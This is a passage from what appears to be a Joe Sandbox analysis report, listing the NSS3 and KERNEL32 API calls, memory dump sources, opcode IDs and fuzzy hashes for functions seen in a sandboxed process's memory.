                                                                                                                                                                                                                                                                                                                      • SECOID_FindOID_Util.NSS3(00000004), ref: 6CE67ED1
                                                                                                                                                                                                                                                                                                                      • SECOID_FindOID_Util.NSS3(00000004), ref: 6CE67EFA
                                                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                                                      • Source File: 00000002.00000002.1864410556.000000006CDE1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CDE0000, based on PE: true
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1864270690.000000006CDE0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865248315.000000006CF7F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865651933.000000006CFBE000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865764551.000000006CFBF000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865853565.000000006CFC0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865945305.000000006CFC5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_6cde0000_file.jbxd
                                                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                                                      • API ID: Util$Arena$Alloc_Arena_FindItem_Value$AllocateCopyCriticalDecodeEnterErrorFreeInitLockPoolQuickSectionUnlockcallocmemcpy
                                                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                                                      • API String ID: 3989529743-0
                                                                                                                                                                                                                                                                                                                      • Opcode ID: 31bb0e9fc0d3859de627d3a2891d1934f21d78b53fc3a4bce6cd9b61a2d21ab3
                                                                                                                                                                                                                                                                                                                      • Instruction ID: 49a2021fc5c58d1a29817275f4341f85a56aea0f4f5d6a230aee93f538783354
                                                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 31bb0e9fc0d3859de627d3a2891d1934f21d78b53fc3a4bce6cd9b61a2d21ab3
                                                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 9F31B0B2E502119BEB008A6A9D41B6773B8AF0435CF250828DC65EBF01E730EC08C7A1
                                                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                                                      • memcpy.VCRUNTIME140(?,?,00000000,?,?,00000000,?,?,6CEBD9E4,00000000), ref: 6CEBDC30
                                                                                                                                                                                                                                                                                                                      • PORT_ArenaAlloc_Util.NSS3(?,0000000C,?,?,00000000,?,?,6CEBD9E4,00000000), ref: 6CEBDC4E
                                                                                                                                                                                                                                                                                                                      • PORT_Alloc_Util.NSS3(0000000C,?,?,00000000,?,?,6CEBD9E4,00000000), ref: 6CEBDC5A
                                                                                                                                                                                                                                                                                                                      • PORT_ArenaAlloc_Util.NSS3(?,?), ref: 6CEBDC7E
                                                                                                                                                                                                                                                                                                                      • memcpy.VCRUNTIME140(00000000,?,?), ref: 6CEBDCAD
                                                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                                                      • Source File: 00000002.00000002.1864410556.000000006CDE1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CDE0000, based on PE: true
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1864270690.000000006CDE0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865248315.000000006CF7F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865651933.000000006CFBE000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865764551.000000006CFBF000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865853565.000000006CFC0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865945305.000000006CFC5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_6cde0000_file.jbxd
                                                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                                                      • API ID: Alloc_Util$Arenamemcpy
                                                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                                                      • API String ID: 2632744278-0
                                                                                                                                                                                                                                                                                                                      • Opcode ID: 379b487b628aa4845001a6cab1548ae51e914facbe267a53f733288059af4d3f
                                                                                                                                                                                                                                                                                                                      • Instruction ID: 748b8b47e84a2a8fd7854028306abc76976fd0022e74cd82d02430c4f5b51cbd
                                                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 379b487b628aa4845001a6cab1548ae51e914facbe267a53f733288059af4d3f
                                                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 3B317EB9A002009FD750CF19D980BA6B7F8AF05358F348429E95CDBB05E771EA44CFA1
                                                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                                                      • TlsGetValue.KERNEL32(00000000,00000000,00000038,?,6CE7E728,?,00000038,?,?,00000000), ref: 6CE82E52
                                                                                                                                                                                                                                                                                                                      • EnterCriticalSection.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 6CE82E66
                                                                                                                                                                                                                                                                                                                      • TlsGetValue.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 6CE82E7B
                                                                                                                                                                                                                                                                                                                      • EnterCriticalSection.KERNEL32(00000000), ref: 6CE82E8F
                                                                                                                                                                                                                                                                                                                      • PL_HashTableLookup.NSS3(?,?), ref: 6CE82E9E
                                                                                                                                                                                                                                                                                                                      • PR_Unlock.NSS3(?), ref: 6CE82EAB
                                                                                                                                                                                                                                                                                                                      • PR_Unlock.NSS3(?), ref: 6CE82F0D
                                                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                                                      • Source File: 00000002.00000002.1864410556.000000006CDE1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CDE0000, based on PE: true
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1864270690.000000006CDE0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865248315.000000006CF7F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865651933.000000006CFBE000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865764551.000000006CFBF000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865853565.000000006CFC0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865945305.000000006CFC5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_6cde0000_file.jbxd
                                                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                                                      • API ID: CriticalEnterSectionUnlockValue$HashLookupTable
                                                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                                                      • API String ID: 3106257965-0
                                                                                                                                                                                                                                                                                                                      • Opcode ID: 9190b7c0e4d7b733f3ac622099a9c61c5779b031480dcb6d3ca9e978eb1ba8b5
                                                                                                                                                                                                                                                                                                                      • Instruction ID: 72980b5eed0efc3eac7e368c6345cace8006dfa2fb42bb6c1f512b98caff8cb5
                                                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 9190b7c0e4d7b733f3ac622099a9c61c5779b031480dcb6d3ca9e978eb1ba8b5
                                                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 1B31F6B5E01505ABEB01AF28DC8597AB774EF2525CB248164EC0897B11E731ED64C7E0
                                                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                                                      • PR_SetError.NSS3(FFFFE002,00000000,?,00000001,?,S&l,6CE86295,?,00000000,?,00000001,S&l,?), ref: 6CEA1ECB
                                                                                                                                                                                                                                                                                                                        • Part of subcall function 6CF0C2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6CF0C2BF
                                                                                                                                                                                                                                                                                                                      • TlsGetValue.KERNEL32(?,00000001,?,S&l,6CE86295,?,00000000,?,00000001,S&l,?), ref: 6CEA1EF1
                                                                                                                                                                                                                                                                                                                      • EnterCriticalSection.KERNEL32(?), ref: 6CEA1F01
                                                                                                                                                                                                                                                                                                                      • PR_SetError.NSS3(00000000,00000000), ref: 6CEA1F39
                                                                                                                                                                                                                                                                                                                        • Part of subcall function 6CEAFE20: TlsGetValue.KERNEL32(6CE85ADC,?,00000000,00000001,?,?,00000000,?,6CE7BA55,?,?), ref: 6CEAFE4B
                                                                                                                                                                                                                                                                                                                        • Part of subcall function 6CEAFE20: EnterCriticalSection.KERNEL32(78831D90,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 6CEAFE5F
                                                                                                                                                                                                                                                                                                                      • PR_Unlock.NSS3(?), ref: 6CEA1F67
                                                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                                                      • Source File: 00000002.00000002.1864410556.000000006CDE1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CDE0000, based on PE: true
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1864270690.000000006CDE0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865248315.000000006CF7F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865651933.000000006CFBE000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865764551.000000006CFBF000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865853565.000000006CFC0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865945305.000000006CFC5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_6cde0000_file.jbxd
                                                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                                                      • API ID: Value$CriticalEnterErrorSection$Unlock
                                                                                                                                                                                                                                                                                                                      • String ID: S&l
                                                                                                                                                                                                                                                                                                                      • API String ID: 704537481-539497627
                                                                                                                                                                                                                                                                                                                      • Opcode ID: e52684f4e32badd3081e6d74cfda2916033f81ffc2b7b3f858abe07b6c66b565
                                                                                                                                                                                                                                                                                                                      • Instruction ID: 56a14483d11959a0f5b10e7ce6bd9508c581fe35f25611d3ca32bb54055bd041
                                                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: e52684f4e32badd3081e6d74cfda2916033f81ffc2b7b3f858abe07b6c66b565
                                                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 41210375A002449FEB009EA9DC41B9A3779AF4536CF244064FC088FB01E730E95287E0
                                                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                                                      • PORT_ArenaMark_Util.NSS3(?,6CECCD93,?), ref: 6CECCEEE
                                                                                                                                                                                                                                                                                                                        • Part of subcall function 6CEC14C0: TlsGetValue.KERNEL32 ref: 6CEC14E0
                                                                                                                                                                                                                                                                                                                        • Part of subcall function 6CEC14C0: EnterCriticalSection.KERNEL32 ref: 6CEC14F5
                                                                                                                                                                                                                                                                                                                        • Part of subcall function 6CEC14C0: PR_Unlock.NSS3 ref: 6CEC150D
                                                                                                                                                                                                                                                                                                                      • PORT_ArenaAlloc_Util.NSS3(?,00000018,?,6CECCD93,?), ref: 6CECCEFC
                                                                                                                                                                                                                                                                                                                        • Part of subcall function 6CEC10C0: TlsGetValue.KERNEL32(?,6CE68802,00000000,00000008,?,6CE5EF74,00000000), ref: 6CEC10F3
                                                                                                                                                                                                                                                                                                                        • Part of subcall function 6CEC10C0: EnterCriticalSection.KERNEL32(?,?,6CE68802,00000000,00000008,?,6CE5EF74,00000000), ref: 6CEC110C
                                                                                                                                                                                                                                                                                                                        • Part of subcall function 6CEC10C0: PL_ArenaAllocate.NSS3(?,?,?,6CE68802,00000000,00000008,?,6CE5EF74,00000000), ref: 6CEC1141
                                                                                                                                                                                                                                                                                                                        • Part of subcall function 6CEC10C0: PR_Unlock.NSS3(?,?,?,6CE68802,00000000,00000008,?,6CE5EF74,00000000), ref: 6CEC1182
                                                                                                                                                                                                                                                                                                                        • Part of subcall function 6CEC10C0: TlsGetValue.KERNEL32(?,6CE68802,00000000,00000008,?,6CE5EF74,00000000), ref: 6CEC119C
                                                                                                                                                                                                                                                                                                                      • SECOID_FindOIDByTag_Util.NSS3(00000023,?,?,?,6CECCD93,?), ref: 6CECCF0B
                                                                                                                                                                                                                                                                                                                        • Part of subcall function 6CEC0840: PR_SetError.NSS3(FFFFE08F,00000000), ref: 6CEC08B4
                                                                                                                                                                                                                                                                                                                      • SECITEM_CopyItem_Util.NSS3(?,00000000,00000000,?,?,?,?,6CECCD93,?), ref: 6CECCF1D
                                                                                                                                                                                                                                                                                                                        • Part of subcall function 6CEBFB60: PORT_ArenaAlloc_Util.NSS3(00000000,E0056800,00000000,?,?,6CEB8D2D,?,00000000,?), ref: 6CEBFB85
                                                                                                                                                                                                                                                                                                                        • Part of subcall function 6CEBFB60: memcpy.VCRUNTIME140(00000000,6A1BEBC6,E0056800,?), ref: 6CEBFBB1
                                                                                                                                                                                                                                                                                                                      • PORT_ArenaAlloc_Util.NSS3(?,00000008,?,?,?,?,?,?,?,6CECCD93,?), ref: 6CECCF47
                                                                                                                                                                                                                                                                                                                      • PORT_ArenaAlloc_Util.NSS3(?,0000000C,?,?,?,?,?,?,?,?,?,6CECCD93,?), ref: 6CECCF67
                                                                                                                                                                                                                                                                                                                      • SECITEM_CopyItem_Util.NSS3(?,00000000,6CECCD93,?,?,?,?,?,?,?,?,?,?,?,6CECCD93,?), ref: 6CECCF78
                                                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                                                      • Source File: 00000002.00000002.1864410556.000000006CDE1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CDE0000, based on PE: true
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1864270690.000000006CDE0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865248315.000000006CF7F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865651933.000000006CFBE000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865764551.000000006CFBF000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865853565.000000006CFC0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865945305.000000006CFC5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_6cde0000_file.jbxd
                                                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                                                      • API ID: Util$Arena$Alloc_$Value$CopyCriticalEnterItem_SectionUnlock$AllocateErrorFindMark_Tag_memcpy
                                                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                                                      • API String ID: 4291907967-0
                                                                                                                                                                                                                                                                                                                      • Opcode ID: a3aab832d6a22432be4a6ae88c8f79b101dc4fa96841c8453af480ac5133103c
                                                                                                                                                                                                                                                                                                                      • Instruction ID: 6aa6fcc85f9b7fdfabebe5361787278243735f2484ab69309947d2bec034b221
                                                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: a3aab832d6a22432be4a6ae88c8f79b101dc4fa96841c8453af480ac5133103c
                                                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 5311D5A5B002405BEB00ABAA6E42B7BB5FC9F4414DF24403DEC29D7741FB60D90886B3
                                                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                                                      • TlsGetValue.KERNEL32 ref: 6CE78C1B
                                                                                                                                                                                                                                                                                                                      • EnterCriticalSection.KERNEL32 ref: 6CE78C34
                                                                                                                                                                                                                                                                                                                      • PL_ArenaAllocate.NSS3 ref: 6CE78C65
                                                                                                                                                                                                                                                                                                                      • PR_Unlock.NSS3 ref: 6CE78C9C
                                                                                                                                                                                                                                                                                                                      • PR_Unlock.NSS3 ref: 6CE78CB6
                                                                                                                                                                                                                                                                                                                        • Part of subcall function 6CF0DD70: TlsGetValue.KERNEL32 ref: 6CF0DD8C
                                                                                                                                                                                                                                                                                                                        • Part of subcall function 6CF0DD70: LeaveCriticalSection.KERNEL32(00000000), ref: 6CF0DDB4
                                                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                                                      • Source File: 00000002.00000002.1864410556.000000006CDE1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CDE0000, based on PE: true
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1864270690.000000006CDE0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865248315.000000006CF7F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865651933.000000006CFBE000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865764551.000000006CFBF000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865853565.000000006CFC0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865945305.000000006CFC5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_6cde0000_file.jbxd
                                                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                                                      • API ID: CriticalSectionUnlockValue$AllocateArenaEnterLeave
                                                                                                                                                                                                                                                                                                                      • String ID: KRAM
                                                                                                                                                                                                                                                                                                                      • API String ID: 4127063985-3815160215
                                                                                                                                                                                                                                                                                                                      • Opcode ID: 399970c11354706a135453948a307f2a5c2ff7be045187d51a4588796a926c4e
                                                                                                                                                                                                                                                                                                                      • Instruction ID: ef6c93b38e0e0bf8f1324784b33100fd856aedd5ef818ab1fc8ebf9a45e220fb
                                                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 399970c11354706a135453948a307f2a5c2ff7be045187d51a4588796a926c4e
                                                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 9321A3B1A156018FD710EF38C484669BBF4FF55318F25896ED888DB701EB35D886CBA2
                                                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                                                      • PK11_GetInternalKeySlot.NSS3(?,?,?,6CEA2E62,?,?,?,?,?,?,?,00000000,?,?,?,6CE74F1C), ref: 6CE88EA2
                                                                                                                                                                                                                                                                                                                        • Part of subcall function 6CEAF820: free.MOZGLUE(6A1B7500,2404110F,?,?), ref: 6CEAF854
                                                                                                                                                                                                                                                                                                                        • Part of subcall function 6CEAF820: free.MOZGLUE(FFD3F9E8,2404110F,?,?), ref: 6CEAF868
                                                                                                                                                                                                                                                                                                                        • Part of subcall function 6CEAF820: DeleteCriticalSection.KERNEL32(04C4841B,2404110F,?,?), ref: 6CEAF882
                                                                                                                                                                                                                                                                                                                        • Part of subcall function 6CEAF820: free.MOZGLUE(04C483FF,?,?), ref: 6CEAF889
                                                                                                                                                                                                                                                                                                                        • Part of subcall function 6CEAF820: DeleteCriticalSection.KERNEL32(CCCCCCDF,2404110F,?,?), ref: 6CEAF8A4
                                                                                                                                                                                                                                                                                                                        • Part of subcall function 6CEAF820: free.MOZGLUE(CCCCCCC3,?,?), ref: 6CEAF8AB
                                                                                                                                                                                                                                                                                                                        • Part of subcall function 6CEAF820: DeleteCriticalSection.KERNEL32(280F1108,2404110F,?,?), ref: 6CEAF8C9
                                                                                                                                                                                                                                                                                                                        • Part of subcall function 6CEAF820: free.MOZGLUE(280F10EC,?,?), ref: 6CEAF8D0
                                                                                                                                                                                                                                                                                                                      • PK11_IsLoggedIn.NSS3(?,?,?,6CEA2E62,?,?,?,?,?,?,?,00000000,?,?,?,6CE74F1C), ref: 6CE88EC3
                                                                                                                                                                                                                                                                                                                      • TlsGetValue.KERNEL32(?,?,?,6CEA2E62,?,?,?,?,?,?,?,00000000,?,?,?,6CE74F1C), ref: 6CE88EDC
                                                                                                                                                                                                                                                                                                                      • EnterCriticalSection.KERNEL32(?,?,?,?,6CEA2E62,?,?,?,?,?,?,?,00000000,?,?), ref: 6CE88EF1
                                                                                                                                                                                                                                                                                                                      • PR_Unlock.NSS3 ref: 6CE88F20
                                                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                                                      • Source File: 00000002.00000002.1864410556.000000006CDE1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CDE0000, based on PE: true
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1864270690.000000006CDE0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865248315.000000006CF7F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865651933.000000006CFBE000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865764551.000000006CFBF000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865853565.000000006CFC0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865945305.000000006CFC5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_6cde0000_file.jbxd
                                                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                                                      • API ID: free$CriticalSection$Delete$K11_$EnterInternalLoggedSlotUnlockValue
                                                                                                                                                                                                                                                                                                                      • String ID: b.l
                                                                                                                                                                                                                                                                                                                      • API String ID: 1978757487-3749612370
                                                                                                                                                                                                                                                                                                                      • Opcode ID: 9414ccfad0974f13102c1cd208bbf9563ac885ee11f65c935c22857cefdb10f7
                                                                                                                                                                                                                                                                                                                      • Instruction ID: b632250311623b70ffabb0088ef83f9e6fc40d63ad912c59f2c482fa61e6a644
                                                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 9414ccfad0974f13102c1cd208bbf9563ac885ee11f65c935c22857cefdb10f7
                                                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: E021AE70A0A7059FC710AF29D5842AABBF0FF48318F11456EEC989BB41E730E854CBD2
                                                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                                                        • Part of subcall function 6CEF5B40: PR_GetIdentitiesLayer.NSS3 ref: 6CEF5B56
                                                                                                                                                                                                                                                                                                                      • PR_EnterMonitor.NSS3(?), ref: 6CEF3E45
                                                                                                                                                                                                                                                                                                                        • Part of subcall function 6CF29090: TlsGetValue.KERNEL32 ref: 6CF290AB
                                                                                                                                                                                                                                                                                                                        • Part of subcall function 6CF29090: TlsGetValue.KERNEL32 ref: 6CF290C9
                                                                                                                                                                                                                                                                                                                        • Part of subcall function 6CF29090: EnterCriticalSection.KERNEL32 ref: 6CF290E5
                                                                                                                                                                                                                                                                                                                        • Part of subcall function 6CF29090: TlsGetValue.KERNEL32 ref: 6CF29116
                                                                                                                                                                                                                                                                                                                        • Part of subcall function 6CF29090: LeaveCriticalSection.KERNEL32 ref: 6CF2913F
                                                                                                                                                                                                                                                                                                                      • PR_EnterMonitor.NSS3(?), ref: 6CEF3E5C
                                                                                                                                                                                                                                                                                                                      • PR_EnterMonitor.NSS3(?), ref: 6CEF3E73
                                                                                                                                                                                                                                                                                                                      • PR_SetError.NSS3(FFFFE8D5,00000000), ref: 6CEF3EA6
                                                                                                                                                                                                                                                                                                                        • Part of subcall function 6CF0C2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6CF0C2BF
                                                                                                                                                                                                                                                                                                                      • PR_ExitMonitor.NSS3(?), ref: 6CEF3EC0
                                                                                                                                                                                                                                                                                                                      • PR_ExitMonitor.NSS3(?), ref: 6CEF3ED7
                                                                                                                                                                                                                                                                                                                      • PR_ExitMonitor.NSS3(?), ref: 6CEF3EEE
                                                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                                                      • Source File: 00000002.00000002.1864410556.000000006CDE1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CDE0000, based on PE: true
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1864270690.000000006CDE0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865248315.000000006CF7F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865651933.000000006CFBE000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865764551.000000006CFBF000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865853565.000000006CFC0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865945305.000000006CFC5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_6cde0000_file.jbxd
                                                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                                                      • API ID: Monitor$EnterValue$Exit$CriticalSection$ErrorIdentitiesLayerLeave
                                                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                                                      • API String ID: 2517541793-0
                                                                                                                                                                                                                                                                                                                      • Opcode ID: 54027f88e9f8c7aef8774f630c25a29e5d64c5ae93700a839b1c12e084a23d9d
                                                                                                                                                                                                                                                                                                                      • Instruction ID: bac8f1244b67bb2da1ce36cf35d2f964703a07a4e007486133f0e6ad0bd5d794
                                                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 54027f88e9f8c7aef8774f630c25a29e5d64c5ae93700a839b1c12e084a23d9d
                                                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 4A117575511700ABEB319E79FC02BC7B7B19F41318F504824E56A87A20E636F92AC753
                                                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                                                      • PR_EnterMonitor.NSS3 ref: 6CF72CA0
                                                                                                                                                                                                                                                                                                                      • PR_ExitMonitor.NSS3 ref: 6CF72CBE
                                                                                                                                                                                                                                                                                                                      • calloc.MOZGLUE(00000001,00000014), ref: 6CF72CD1
                                                                                                                                                                                                                                                                                                                      • strdup.MOZGLUE(?), ref: 6CF72CE1
                                                                                                                                                                                                                                                                                                                      • PR_LogPrint.NSS3(Loaded library %s (static lib),00000000), ref: 6CF72D27
                                                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                                                      • Loaded library %s (static lib), xrefs: 6CF72D22
                                                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                                                      • Source File: 00000002.00000002.1864410556.000000006CDE1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CDE0000, based on PE: true
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1864270690.000000006CDE0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.1865248315.000000006CF7F000.00000002.00000001.01000000.00000009.sdmpDownload File
